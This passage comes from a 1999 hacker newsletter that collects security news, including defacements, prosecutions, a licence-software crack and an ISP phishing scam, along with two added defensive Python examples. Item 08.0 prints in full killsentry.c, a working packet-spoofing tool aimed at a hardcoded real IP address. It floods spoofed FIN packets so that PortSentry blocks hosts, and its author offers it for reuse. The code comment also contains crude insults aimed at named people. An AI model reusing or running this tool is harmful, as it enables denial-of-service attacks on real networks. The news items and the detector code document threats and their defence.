Although this particular security flaw has been patched, there is an important lesson that can be learned by both online game enthusiasts and software developers. Developing software for critical systems is a difficult and misunderstood topic. When the stakes are high, it pays to go to great lengths to ensure that software has been implemented with proper considerations for security and safety. If it is not, innocent people may be hurt or taken advantage of. A developer must understand the risks that are introduced by his / her code, and a system user must be convinced that such risks have been mitigated.
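The seed-space argument above, as an added example (not RST's or ASF's code): a small model of a clock-seeded shuffle that measures how few decks it can produce and how five known cards narrow the seed, next to a shuffle driven by the operating system's CSPRNG. The generator constants, the shuffle loop, the card positions in VISIBLE and the scenario values are assumptions of this model; the demo window is kept to a few thousand seeds so it runs quickly.

```python
import math
import secrets

MS_PER_DAY = 86_400_000      # a "milliseconds since midnight" seed has this many values
VISIBLE = (0, 3, 6, 7, 8)    # assumed deck positions of two hole cards + three flop cards


class Lcg32:
    """32-bit LCG standing in for the game's Random(); the constants are assumed."""

    def __init__(self, seed):
        self.state = seed & 0xFFFFFFFF

    def below(self, n):
        """Return an integer in [0, n) derived from the next generator state."""
        self.state = (self.state * 134775813 + 1) & 0xFFFFFFFF
        return (self.state * n) >> 32


def weak_shuffle(seed):
    """Reorder an ordered deck from one seeded stream (the flawed design)."""
    rng = Lcg32(seed)
    deck = list(range(52))
    for i in range(51, 0, -1):
        j = rng.below(i + 1)
        deck[i], deck[j] = deck[j], deck[i]
    return deck


def strong_shuffle():
    """Fisher-Yates driven by the OS CSPRNG: no seed to guess from a clock."""
    deck = list(range(52))
    for i in range(51, 0, -1):
        j = secrets.randbelow(i + 1)
        deck[i], deck[j] = deck[j], deck[i]
    return deck


def search_space_bits():
    """log2 of the number of decks reachable under each condition in the text."""
    return {
        "fair deck (52!)": math.log2(math.factorial(52)),
        "32-bit seed": 32.0,
        "ms-since-midnight seed": math.log2(MS_PER_DAY),
        "clock-synchronised window": math.log2(200_000),
    }


def seeds_consistent_with(observed, clock_estimate_ms, window_ms):
    """List seeds within +/- window_ms of the estimate that reproduce the observed cards."""
    hits = []
    for guess in range(clock_estimate_ms - window_ms, clock_estimate_ms + window_ms + 1):
        seed = guess % MS_PER_DAY          # the seed wraps around at midnight
        deck = weak_shuffle(seed)
        if all(deck[pos] == card for pos, card in observed.items()):
            hits.append(seed)
    return hits


def audit(true_seed, clock_error_ms, window_ms):
    """Constructed scenario: shuffle with true_seed, reveal five cards, list surviving seeds."""
    deck = weak_shuffle(true_seed)
    observed = {pos: deck[pos] for pos in VISIBLE}
    hits = seeds_consistent_with(observed, true_seed + clock_error_ms, window_ms)
    return deck, hits


if __name__ == "__main__":
    for label, bits in search_space_bits().items():
        print(f"{label:28s} ~2^{bits:.1f} decks")
    # Constructed values: seed for 12:34:56.789, observer's clock off by 1.5 s.
    deck, hits = audit(true_seed=45_296_789, clock_error_ms=1_500, window_ms=2_000)
    print("seeds matching five known cards:", hits)
    print("full deck reproduced:", [weak_shuffle(s) == deck for s in hits])
    print("CSPRNG deck starts:", strong_shuffle()[:5])
```

The same audit run against strong_shuffle() has nothing to enumerate, because its output does not depend on any value an observer can estimate.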
At Reliable Software Technologies, our mission in the Software Security Group is to stamp out insecure code before it is placed in service. Members of the group involved with the Gambling exploit are: Brad Arkin, Frank Hill, Scott Marks, Matt Schmid, and TJ Walls. The Software Security Group is led by Dr. Gary McGraw.

Matt Schmid
Reliable Software Technologies
mschmid@rstcorp.com

@HWA

05.0 Zyklon Pleads Guilty
~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com

contributed by Weld Pond

Zyklon (Eric Burns) has pleaded guilty to charges of defacing the web pages of NATO, Vice President Al Gore, and the United States Information Agency (USIA). Zyklon also admitted that he advised others on how to attack www.whitehouse.gov last May. Zyklon faces a maximum of five years in prison and a $250,000 fine, and possible restitution. His sentencing is scheduled for November 19, 1999.

C|Net
http://www.news.com/News/Item/Textonly/0,25,41358,00.html?pfv

Cracker admits to invading government Web sites
By Reuters
Special to CNET News.com
September 7, 1999, 3:05 p.m. PT
URL: http://www.news.com/News/Item/0,4,41358,00.html

WASHINGTON--A 19-year-old computer cracker with the screen name "Zyklon" pleaded guilty today to attacks involving Web pages for NATO, Vice President Al Gore, and the United States Information Agency (USIA), prosecutors said.

Prosecutors from the U.S. Attorney's Office said Eric Burns of Shoreline, Washington, also admitted in federal court in Alexandria, Virginia, that he had advised others on how to attack the White House Web site in May.

They said Burns faces a maximum possible punishment of five years in prison and a $250,000 fine, and he could have to pay restitution. His sentencing is scheduled for November 19 before U.S. District Judge James Cacheris.

Burns acknowledged that the computer intrusions caused damages exceeding $40,000, the prosecutors said. He admitted to cracking computers in Virginia, Washington state, London, and Washington, D.C.
Prosecutors said Burns designed a program called "Web bandit" to identify computers on the Internet vulnerable to attack. He found that the computer server at Electric Press in Reston, Virginia, was vulnerable and attacked it four times between August 1998 and January 1999, they said. Electric Press hosted the Web pages for NATO, the vice president, and USIA. Prosecutors said the attacks affected U.S. embassy and consulate Web sites, which depended on the USIA for information. One attack resulted in the closing down of the USIA Web site for eight days, they said. Prosecutors said Burns attacked the Web pages of about 80 businesses whose pages were hosted by Laser.Net in Fairfax, Virginia; the Web pages of two corporate clients of Issue Dynamics in Virginia and Washington, D.C.; and the University of Washington Web page. They said Burns also attacked an Internet service provider in London. Burns usually replaced the Web pages with his own, which often made references to "Zyklon" and his love for a woman named "Crystal," they said. The prosecutors said there was an attempt to replace the White House Web page with one referring to "Zyklon" and "Crystal" in May. The White House was forced to shut down the page for two days, and the computer system was reconfigured. Although Burns took credit for the attack during an Internet chat session, he told the judge he simply had provided advice to others on how to do it, the prosecutors said. Story Copyright © 1999 Reuters Limited. All rights reserved. Wired; http://www.wired.com/news/print_version/email/explode-infobeat/politics/story/21625.html?wnpg=all NATO Cracker Pleads Guilty Reuters 3:00 a.m. 8.Sep.99.PDT A 19-year-old computer hacker with the screen name "Zyklon" pleaded guilty Tuesday to attacks involving Web pages for NATO, Vice President Al Gore, and the United States Information Agency, prosecutors said. 
Prosecutors from the US Attorney's Office said Eric Burns of Shoreline, Washington, also admitted in federal court in Virginia that he advised others on how to attack the White House Web site in May. They said Burns faced a maximum possible punishment of five years in prison, a US$250,000 fine and having to pay restitution. His sentencing was scheduled for 19 November before US District Judge James Cacheris. Burns acknowledged the computer intrusions had caused damages exceeding $40,000, the prosecutors said. He also admitted that he had hacked and damaged computers in Washington, Virginia, Washington state, and London. Prosecutors said Burns designed a program called "Web bandit" to identify computers on the Internet vulnerable to attack. He found that the computer server at Electric Press in Reston, Virginia, was vulnerable and attacked it four times between August 1998 and January 1999, they said. Electric Press hosted the Web pages for NATO, the vice president, and the USIA. Prosecutors said the attacks affected embassy and consular Web sites, which depend on the USIA for information. One attack resulted in the closing down of the USIA Web site for eight days. Prosecutors said Burns also attacked the Web pages of about 80 businesses whose pages were hosted by Laser.Net in Fairfax, Virginia. There were further attacks on the Web pages of two corporate clients of Issue Dynamics in Virginia and Washington, as well as the University of Washington Web page. Prosecutors said Burns also ranged overseas, hitting an Internet service provider in London. Burns usually replaced the Web pages with his own, which often made references to "Zyklon" and his love for a woman named "Crystal," they said. The prosecutors said there was an attempt to replace the White House Web page with one referring to "Zyklon" and "Crystal" in May. The White House was forced to shut down the page for two days and the computer system was reconfigured. Copyright 1999 Reuters Limited. 
@HWA

06.0 Mitnick Transferred to Lompoc Federal Prison
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com

contributed by punkis

Kevin Mitnick has finally been transferred to the facility where he will spend the remainder of his sentence. It was hoped that he would be sent to the Nellis Federal Prison Camp, where living and working conditions would be a little better than what he's lived with for the past four and a half years he spent awaiting trial. He would also be closer to his mother and grandmother. Unfortunately he has been sent to Lompoc Federal Correctional Institution.

Free Kevin
http://www.freekevin.com

Bureau of Prisons
http://www.bop.com

@HWA

07.0 C-Span Web Site Defaced
~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com

contributed by Wolf D

The cable TV network C-SPAN, which broadcasts House and Senate proceedings and other public affairs programming, had its web page defaced by a group known as the 'United Loan Gunmen'.

CNN
http://www.cnn.com/TECH/computing/9909/05/cspan.hacked.ap/

CMP TechWeb
http://www.techweb.com/wire/story/TWB19990906S0002

Associated Press - Via Yahoo
http://dailynews.yahoo.com/h/ap/19990905/tc/c_span_hacked_2.html

HNN Cracked Pages Archive
http://www.hackernews.com/archive/crackarch.html

CNN;

Hackers hit Web site of C-SPAN
September 6, 1999
Web posted at: 2:10 a.m. EDT (0610 GMT)

WASHINGTON (AP) -- Hackers vandalized the Internet site of the C-SPAN cable network Sunday, replacing its Web page with a bizarre note that included lyrics from a punk rock band.

The hackers, calling themselves "United Loan Gunmen," also claimed responsibility for the defacement of the Internet site for ABC just weeks ago. The group is believed to be relatively newly formed, and its only known attacks have been the ones against C-SPAN and ABC.

Officials at C-SPAN, the public affairs cable network that broadcasts House and Senate proceedings and other public affairs programming, could not be reached Sunday night.
The C-SPAN site has since been repaired. The Web site for C-SPAN was temporarily replaced with a black page carrying the logo for the hacker group. It also included lyrics from a song by the punk band, Dead Kennedys, that purports to be a conversation between a U.S. government official and the leader of a Middle Eastern country. The defacement against C-SPAN was first reported on a Web site, Attrition.Org, which tracks hacking efforts on the Internet. The Attrition site contains a mirror of the hacked version. Copyright 1999 The Associated Press. All rights reserved. This material may not be published, broadcast, rewritten, or redistributed. CMP; Crackers Deface C-SPAN Website By Guy Middleton, TechWeb Sep 6, 1999 (5:26 AM) URL: http://www.techweb.com/wire/story/TWB19990906S0002 Crackers have defaced the Website of U.S. cable tv channel C-SPAN, according to the Associated Press. The crackers, who dubbed themselves the "United Loan Gunmen" (ULG) posted a transcript of a Dead Kennedys song on the site, which contained a fictional discussion between a U.S. government official and a Middle Eastern politician. The ULG presented the transcript as real and said it was discovered, encrypted, on C-SPAN's network. Associated Press; Sunday September 5 11:38 PM ET Hackers Vandalize C-Span Web Site WASHINGTON (AP) - Hackers vandalized the Internet site of the C-SPAN cable network Sunday, replacing its Web page with a bizarre note that included lyrics from a punk rock band. The hackers, calling themselves ``United Loan Gunmen,'' also claimed responsibility for the defacement of the Internet site for ABC just weeks ago. The group is believed to be relatively newly formed, and its only known attacks have been the ones against C-SPAN and ABC. Officials at C-SPAN, the public affairs cable network that broadcasts House and Senate proceedings and other public affairs programming, could not be reached Sunday night. 
The Web site for C-SPAN was temporarily replaced with a black page carrying the logo for the hacker group. It also included lyrics from a song by the punk band, Dead Kennedys, that purports to be a conversation between a U.S. government official and the leader of a Middle Eastern country. The defacement against C-SPAN was first reported on a Web site, Attrition.Org, which tracks hacking efforts on the Internet. @HWA 08.0 killsentry.c a Port Sentry killer ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by the author via wyze1, this piece of code will crash Port Sentry a common internet firewall program. - Ed /* killsentry.c (c) 1999 Vortexia / Andrew Alston Excuse the crappy coding, this code was written when I was very bored, had nothing better to do, and felt like proving the point that automatic firewalling is a bad idea. The code spoofs FIN packets from sequential internet hosts, starting at 1.0.0.0 and going right through to 255.255.255.255, sending 15 packets from each, one packet each to port 100 to 115. Feel free to modify this code, if you use the code for anything, please give me credit where it is due. I hold no responsibility for anything this code is used for, I give no guarantees that this code works, and I hold no responsibility for anything this code does to any system you run it on. If you screw up with it, its your problem, not mine. The code compiles 100% fine with no warnings on FreeBSD 3.2, I dont know about any other platforms or systems. 
Greets and shoutouts: Wyze1 - Thanks for the moral support, here is something you may use in Forbidden Knowledge Sniper - My partner in crime, you rock Timewiz - What can I say, thanks for ideas for projects still coming Moe1 - For all the information Ive had from you - Its appreciated Uglykidjoe - For things said and done - I owe you Hotmetal - A general greet Bretton Vine - Dont worry the underground you hate so much still loves you Everyone else in #hack on irc.electrocity.com - You guys rock Curses, fuckoffs, and the like - Logik - Get a clue, skript kiddie life aint the way Gaspode - I dont think I even need this - a major FUCK YOU and I hope you get castrated with a rusty spoon - take your god like attitude and shove it up your ass Sunflower - May you fall pregnant to one of the many ircops you screw Anyone else that I dislike but cant think of right now - FUCK YOU Anyone who dislikes me - FUCK YOU */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include int main(int argc, char *argv[]) { #define TARGETHOST "209.212.100.196" int octet1, octet2, octet3, octet4; int i; int sock; int on = 1; struct sockaddr_in sockstruct; struct ip *iphead; struct tcphdr *tcphead; char ipkill[20]; char evilpacket[sizeof(struct ip) + sizeof(struct tcphdr)]; struct in_addr spoof, target; int seq, ack; bzero(&evilpacket, sizeof(evilpacket)); // Very bad way to generate sequence numbers srand(getpid()); seq = rand()%time(NULL); ack = rand()%time(NULL); if(argc < 2) { printf("Usage: %s target_host\n",argv[0]); exit(-1); }; target.s_addr=inet_addr(TARGETHOST); if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { perror("socket"); exit(-1); } if(setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&on,sizeof(on)) < 0) { perror("setsockopt"); exit(-1); } sockstruct.sin_family = AF_INET; iphead = (struct ip *)evilpacket; tcphead = (struct tcphdr *)(evilpacket + sizeof(struct ip)); iphead->ip_hl = 5; iphead->ip_v = 4; 
iphead->ip_len = sizeof(struct ip) + sizeof(struct tcphdr); iphead->ip_id = htons(getpid()); iphead->ip_ttl = 255; iphead->ip_p = IPPROTO_TCP; iphead->ip_dst = target; iphead->ip_sum = 0; iphead->ip_tos = 0; iphead->ip_off = 0; tcphead->th_sport = htons(80); tcphead->th_seq = htonl(seq); tcphead->th_ack = htonl(ack); tcphead->th_win = htons(512); tcphead->th_flags = TH_FIN; tcphead->th_off = 0x50; for(octet1 = 1; octet1 <= 255; octet1++) for(octet2 = 0; octet2 <= 255; octet2++) for(octet3 = 0; octet3 <= 255; octet3++) for(octet4 = 0; octet4 <= 255; octet4++) { bzero(ipkill, 20); sprintf(ipkill, "%d.%d.%d.%d", octet1, octet2, octet3, octet4); for(i = 100; i <= 115; i++) { tcphead->th_dport = htons(i); sockstruct.sin_port = htons(i); spoof.s_addr = inet_addr(ipkill); iphead->ip_src = spoof; sockstruct.sin_addr = spoof; sendto(sock,&evilpacket,sizeof(evilpacket),0x0,(struct sockaddr *)&sockstruct, sizeof(sockstruct)); } } return(1); };

@HWA

09.0 W. Richard Stevens dead at 48
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com

W. Richard Stevens - Dead at 48

contributed by evil wench

W. Richard Stevens, noted technology author and teacher, died last Wednesday. Stevens was best known for his UNIX Network Programming series and TCP/IP Illustrated book. The family has asked that in lieu of flowers, donations be made in Richard's name to Habitat for Humanity, 2950 E. 22nd Street, Tucson, AZ 85713. He is survived by his wife and three children. The cause of death was not reported.
Big Deal Classifieds - His Obituary
http://www.bigdealclassifieds.com/classified/plsql/classlevel3_step?wClass=0002&wPubdate=Friday&wRowstart=2&wLessOrMore=

Habitat for Humanity
http://www.habitat.org/

Some books written by Richard Stevens:

TCP/IP Illustrated, Volume 1 : The Protocols
Unix Network Programming : Networking Apis: Sockets and Xti (Volume 1)
UNIX Network Programming: Interprocess Communications (Volume 2)
Advanced Programming in the Unix Environment
Unix Network Programming

@HWA

10.0 New Palm Pilot RedBox for Canada is Released
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com

contributed by Hack.Canada

Cyb0rg/asm has released a new, stand-alone version of RedPalm, a Canadian Red Box for the Palm Pilot. This revision corrects timing issues related to processor clock speed on the newer Pilots, as well as featuring quarter, dime, and nickel tones and a snazzy new interface. (This will not work in the US or most other countries due to differences in the types of tones the various phone systems use.)

Hack Canada
http://www.hackcanada.com/homegrown

@HWA

11.0 Windows2000test Suffers Attack
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com

contributed by Weld Pond

A poison packet attack directed against window2000test.com has been claimed to have been successful by the perpetrators. Microsoft claims the server withstood the attack and manually disabled the attackers. (Why are people wasting their time with this? Go do something useful.)

C|Net
http://www.news.com/News/Item/Textonly/0,25,41287,00.html?pfv

Hackers answer Microsoft's Windows 2000 dare
By Stephen Shankland
Staff Writer, CNET News.com
September 3, 1999, 12:55 p.m. PT
URL: http://www.news.com/News/Item/0,4,41287,00.html

Hackers have answered Microsoft's dare and disabled part of a Windows 2000 server, but both sides are claiming victory.
A group of hackers say they disabled part of the server that Microsoft put on the Web as a test for those who think they can breach the system's security. Two attacks that took down the guest book section of the Windows 2000 Beta Internet Test Site took place yesterday. The group sent "poison packets" to the server. The packets masqueraded as small chunks of information but actually were quite large, said George Davey, a leader of the effort. Microsoft confirmed the attack, saying technicians manually disconnected the attackers. While the server's CPU was working to swallow the larger-than-expected data packets, the guest book page was inaccessible. However, the overall system didn't crash and the attackers didn't seize control, said Keith White, director of marketing for Microsoft's business and enterprise division. CNET News.com verified that the guest book didn't appear during one of the attacks yesterday, returning the error message "There is a problem with the page you are trying to reach and it cannot be displayed... Internal server error." Computer security is an increasingly important field as companies move more services to the Internet, often with publicly accessible Web sites that allow visitors to interact with corporate computers. Microsoft wants to make Windows 2000 "the most secure version of Windows ever, both in terms of feature functionality, and system design," the Web site says. Microsoft's site has "ground rules" that exhort would-be attackers to "find the interesting 'magic bullet' that will bring the machine down" and see if they can find "hidden messages sprinkled around the computer." Both sites declared victory. Davey said his group succeeded in getting past some of the computer's defenses, and Microsoft said it succeeded in keeping the machine running and finding new vulnerabilities to address. "This is exactly what we want customers to do with this site," White said. 
Shortly after the test site went up, the same server was taken down by a lightning storm, but Microsoft also acknowledged at the time that the guest book program had been compromised. Since the site was switched on a month ago, Microsoft has found and fixed four bugs in how the server handles Internet information, White said. An attacker crashed the machine August 17, Microsoft said.

Tests only moderately useful

Putting a server up for would-be attackers to pound on allows companies to find new security holes, but "a lot of these challenges are more to help the perception that the machine is secure," said Christopher Klaus, chief technology officer of Internet Security Systems. The most serious computer crackers won't participate in such challenges because they don't want to show their hand, Klaus said. "Some people who know how to break in may not want to disclose all their secrets," Klaus said. "If a robber has a master key to break into every building in the world, he's not going to go to the FBI and demonstrate." Windows NT and 2000, as well as Unix and other operating systems, aren't particularly secure unless set up properly, Klaus said. "Most systems out there by default are wide open in terms of security issues," he said, but "can be made pretty secure if configured properly and locked down." More dangerous today are the software applications that reside on top of the operating system. E-commerce has raised a host of new problems because it involves many applications, Klaus said. "Most hackers simply go around it by going through the application layer. As we're seeing e-commerce take off, the hacker's target isn't a small bull's-eye."

Attacking the Web server

The attacks on the Microsoft server yesterday came through the Active Server Pages (ASP) component of Microsoft's Internet Information Services (IIS) Web server software, Davey said.
In testing the attack on his own Windows 2000 servers, he said restarting the server didn't fix the problem; instead, the IIS software had to be reinstalled. Also on the test server, the attack caused the computer's CPU usage to jump to 100 percent. On the Microsoft site, the computer returned to normal once the access was shut down. "Most people don't have the expertise to selectively shut off [specific Internet addresses] like that," Davey said today. "Had they not shut us off, it would have killed their machine." Davey thought it notable that the Microsoft server initially made no mention of the ASP problems. "Why don't you guys mention any of the ASP downtime that we have documented?" he asked in an email to Microsoft. Notification of the attack appeared on the Web site at 10 a.m. today, after CNET News.com called Microsoft about the attack. The machine is running a beta, or test version, of Windows 2000, on a Pentium III chip with 256 MB of memory. The machine has been configured to make access difficult, Davey and Microsoft said. However, as the test continues, the company likely will open up more access channels known as "ports" to test it more heavily. Davey said the challenge of breaking into the system is fun. "Normally, you can't hack, because it's illegal." He praised Windows 2000 as "by far the best thing ever released by Microsoft." But there's still room for improvement. "All these open holes that get shut up will lead to a more secure server," Davey said.

@HWA

12.0 Flex-LM Security Breached
     ~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com

contributed by Arik

A security hole has been found in Globetrotter Software Inc.'s Flex-LM, a software package used to prevent pirating of electronic design automation (EDA) tools. The breach allows end users to generate keys to bypass the software's copy protection schemes. Some EDA tools retail for upwards of $44,000 per user.
Electronic News
http://www.electronicnews.com/enews/news/1229-246NewsDetail.asp

Hackers compromise software used to protect EDA tools

Sep 03, 1999 --- A group of hackers have compromised Globetrotter Software Inc.'s Flex-LM, a software package used by electronic design automation (EDA) tools providers to protect software tools licensed to end-users. EDA industry veteran John Cooley, who was informed of the hack by a colleague, reported the incident this afternoon in ESNUG, his EDA industry newsletter. Only limited details related to the nature of the hack were posted due to its pervasive nature. Virtually all of the EDA vendors license their software using Globetrotter's Flex-LM. The software breach has been posted to an undisclosed Web site that offers free downloads. Another Web site provides tutorials for using the cracked code. With some tools costing $44,000 plus per seat, the "free" key carries a heavy toll. The 6 Meg download allows its users to generate keys that open any Windows-NT based EDA software package to end-users. Essentially, the software renders any existing or protected evaluation copy into a "free" copy by allowing the user to key into the software indefinitely. The networking of NT and UNIX systems probably means this crack could enable the "free" use of UNIX based EDA tools, Cooley said. Cooley did not disclose the site, offering instead to inform authentic EDA company representatives of its whereabouts. Since posting the news this afternoon, the EDA veteran said he has received more than 48 emails from EDA vendors either confirming the hack or requesting more information about the break in Flex-LM. Globetrotter representatives could not be reached for comment by press time.

@HWA

13.0 Customers of Numerous ISPs Victims of Fraud
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com

contributed by Dark VVulf

A new and interesting form of fraud has appeared around the net.
It works like this: a new but similar web site is set up, then the ISP's user base is spammed, telling them that their accounts are overdue. The email directs the users to the fake web site and asks them to reenter their credit card information. The users then find large charges on their credit card bills. At least three ISPs have been hit with this scam.

Wired
http://www.wired.com/news/news/technology/story/21572.html

New Web Scam Attacks ISPs
by Chris Oakes
3:00 a.m. 3.Sep.99.PDT

"According to our records, your payment for your Internet access account is late. Perhaps you overlooked it? ...It is very important that you contact us as soon as possible. To update your account information, please go to http://www.valuehelp.net." Oh, and once you get there, we'll rob you blind. Customers of California ISP Value Net received such a message this week, signed by "Sheila Baker, Administrative Assistant." Problem was, it was a scam. ISP abuse experts and the Secret Service say it looks like a new and sophisticated brand of Web scam that is bound to get worse. "It's particularly scary because of the nature of it. It all looks real, and it's easy to perpetrate," said Patrick Greenwell, an Internet consultant who's seen all types of electronic spams and scams come and go. Value Net president Tom Fawcett said at least one of the customers who visited the site entered a credit card number. After Value Net alerted him to the fraud, the customer discovered a substantial unauthorized charge on his account. "When you go to that Web site, a dialog first comes up and says you are entering a secure Web site at Value Net. You're not -- but it says you are," said Fawcett. "They went to a lot of work to make it appear legitimate." The spoof site uses a closely related domain name -- in this case, valuehelp.net, a convincing spin on value.net. Once there, users encountered a form telling them to re-enter their email, name, address, credit card information, and more.
Fawcett wasn't sure how many Value Net customers had responded to the email. But he said the ISP received 30 responses to its scam alert notice warning customers not to respond to the phony instructions. The fraudulent site was still operational Thursday morning, but the New Jersey-based service provider hosting the domain shut the site down by the end of the day. Value Net is not the first ISP to encounter such a scam. Peter Veeck, a network administration consultant for Sherman, Texas, ISP Internet Texoma reported that his customers were targeted by a similar fraudulent email in July. One other ISP also confirmed it had been targeted by the same type of fraud, but declined to go on record. Internet Texoma customers were instructed to send their credit card numbers to an address at a free Web-based email service. "There were only about four [customers] that responded," Veeck said. "We caught it pretty quickly." The practice has early roots in scams targeting America Online members several years ago. Though sometimes successful, these scams often had telltale flaws, however, such as obviously fishy return email and Web addresses and crude site mock-ups. The sophistication of the scam perpetrated on Value Net customers represents an alarming refinement of the technique to Internet abuse experts. It also appears to be targeting more mom-and-pop ISPs, rather than just AOL. Value Net's Fawcett stressed that his customers were also alerted -- and protected -- within half an hour of the fraudulent email transmission Wednesday. Value Net customers attempting to visit the URL were redirected to a page containing a warning about the scam. When Fawcett contacted 9 Net Avenue, the fraudulent site's host ISP, the service told him they would not shut the offending down without a court order. So Fawcett turned to the FBI. Since the matter involved credit card fraud, the FBI directed him to the Secret Service, which took prompt action. "We looked at Mr.
Fawcett's Web site and compared it to the one that this illegitimate company had set up ... and we were able to match the link to a person down in San Diego who's operating this illegal Web site," said Andrew Dengler, special agent for the San Francisco field office of the Secret Service. Dengler said the San Diego branch of the Secret Service has launched an investigation into the registered domain holder. The Value Net scam was the first for his field office, Dengler said. But he expects more. So do Veeck and Fawcett. "I'm positive that in the next couple of months we're going to see more of this kind of activity," Dengler said. "And I'm optimistic we're going to see more laws passed to help us deal with it." Meanwhile, Fawcett wasn't happy that it took Secret Service involvement to get 9 Net Avenue to act to solve the problem before it wreaked havoc on his customers' credit card accounts. "Most ISPs cooperate and get people to take it down or modify the site," Fawcett said. "But these guys at 9 Net Avenue, they just stiff-armed us." Patrick McGilloway, director of client services for 9 Net Avenue, said the ISP was just following due process to ensure the complaint was legitimate. "Of course, Tom and Value Net wanted to make sure it was shut off the moment he complained, and we had to make sure who we were dealing with." The Secret Service's Dengler agreed that 9 Net Avenue wasn't necessarily wrong to say it needed a court order. "They were just covering themselves legally.... It's something that's very new right now for the legal and prosecutorial community." Veeck, of Internet Texoma, doesn't necessarily agree that more laws are the solution. "If we as denizens of the Internet have to resort to law enforcement, then we give law enforcement control over the Internet. Is that something we want to do? ...Law enforcement should be involved. But the ISPs and everybody needs to work together when they can."
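The look-alike domain at the heart of the scam reported above (valuehelp.net posing as value.net) is something an ISP's mail filter can check for mechanically. The Python below is an added example, not part of the original issue or the Wired article; the function names, the bait-word list and all sample URLs other than the one quoted in the article are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Assumed list of words commonly bolted onto a brand name in billing scams.
BAIT_WORDS = ("help", "billing", "support", "secure", "account", "login", "update")
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)

# Constructed sample: the first sentence follows the message quoted in the
# article; the second sentence and its URLs are invented for this example.
SAMPLE_MAIL = (
    "According to our records, your payment for your Internet access account "
    "is late. To update your account information, please go to "
    "http://www.valuehelp.net.\n"
    "Invoices are at http://www.value.net/billing, our charity page links to "
    "http://www.habitat.org/ and payments go to http://va1ue.net/pay\n"
)


def registered_domain(host):
    """Return the last two labels of a host name, lower-cased.

    Simplification: right for .net/.com style names; a production filter
    should consult the Public Suffix List for names such as example.co.uk.
    """
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def edit_distance(a, b):
    """Levenshtein distance using two rows of the dynamic-programming table."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(domain, own_domains):
    """Return (verdict, reason); verdict is 'own', 'lookalike' or 'other'."""
    if domain in own_domains:
        return "own", "exact match"
    label = domain.split(".")[0].replace("-", "")
    for own in own_domains:
        brand = own.split(".")[0]
        if label == brand:
            return "lookalike", f"{brand!r} under a different suffix"
        for word in BAIT_WORDS:
            if label in (brand + word, word + brand):
                return "lookalike", f"{brand!r} combined with {word!r}"
        # Short brands produce too many accidental near-matches, so skip them.
        if len(brand) >= 4 and edit_distance(label, brand) == 1:
            return "lookalike", f"one character away from {brand!r}"
        if len(brand) >= 4 and brand in label:
            return "lookalike", f"embeds {brand!r}"
    return "other", "no resemblance to a protected name"


def scan_message(text, own_domains):
    """Classify every http(s) URL in a message body against the ISP's domains."""
    findings = []
    for url in URL_RE.findall(text):
        url = url.rstrip(".,;:!?)")          # drop sentence punctuation
        host = urlsplit(url).hostname or ""
        domain = registered_domain(host)
        verdict, reason = classify(domain, own_domains)
        findings.append((domain, verdict, reason))
    return findings


if __name__ == "__main__":
    for domain, verdict, reason in scan_message(SAMPLE_MAIL, {"value.net"}):
        print(f"{verdict:10}{domain:16}{reason}")
```

Mail addressed to the ISP's own customers that carries a "lookalike" link is a candidate for quarantine or for the kind of warning redirect Value Net put in place.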
@HWA

14.0 Air Force Asks to Preserve 'Panther Den'
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com

contributed by Weld Pond

The Air Force has asked House and Senate appropriators to restore almost $500,000 recently cut from the FY 2000 budget. The monies were earmarked for a highly classified program to protect military computer networks from electronic attacks. The program is known as the 'Panther Den'. Further details on 'Panther Den' are unavailable due to its classified nature.

JYA.com - originally from 'Inside the Air Force'
http://jya.com/af-bio-bt.htm

Inside the Air Force, September 3, 1999
Money to be used for information security

AIR FORCE ASKS APPROPRIATORS TO PRESERVE FY-00 'PANTHER DEN' SPENDING
Richard Lardner

The Air Force has called on House and Senate appropriators to restore nearly $500,000 to a highly classified program the service maintains is a key part of its overarching effort to protect military computer networks from electronic attacks. While the amount of money at issue is modest when compared to other programs, an Air Force "budget/program fact paper" shipped to Capitol Hill and obtained by Inside the Air Force claims serious problems will result if the funding is left out of the fiscal year 2000 defense spending bill. "Eliminating this funding line would entirely halt the planned development of sophisticated techniques and technologies for defending systems against sophisticated information warfare and computer network attacks that are beyond commercially available protection systems," the appeal reads. In its FY-00 spending request, the Air Force sought $491,000 in research and development spending for the special access program, known as Panther Den. While Senate provided the requested amount in its FY-00 defense appropriations package, House appropriators did not, citing a desire to eliminate or consolidate budget line items with less than $1 million in funding.
But the appeal paper charges the House appropriations position is shortsighted. "The House position, which implies the $0.5 million is used for 'legacy programs that have long since transitioned from development to production to fielding,' should not apply to this program," the paper reads. "This innovative project line is in its infancy in the emerging computer network defense field. . . . This program funds research and development in the Panther Den [SAP] which develops sensitive information operations technologies for the purpose of achieving information superiority," the document adds. According to the fact paper, the Air Force planned to double the annual funding level for Panther Den to $1 million per year beginning in FY-01. The service says boosting Panther Den spending is consistent with previous congressional direction. Specifically, the paper cites the classified annex from a May 1998 House National Security Committee report that states, "Moreover, considering the importance attached to attaining information assurance, the committee questions the meager resources that have been provided to the Panther Den program office." The House and Senate defense authorization committees fully funded the request. Special access programs, better known as "black" programs, are tightly controlled efforts. SAP managers are able to determine who has a "need to know" about the program, an 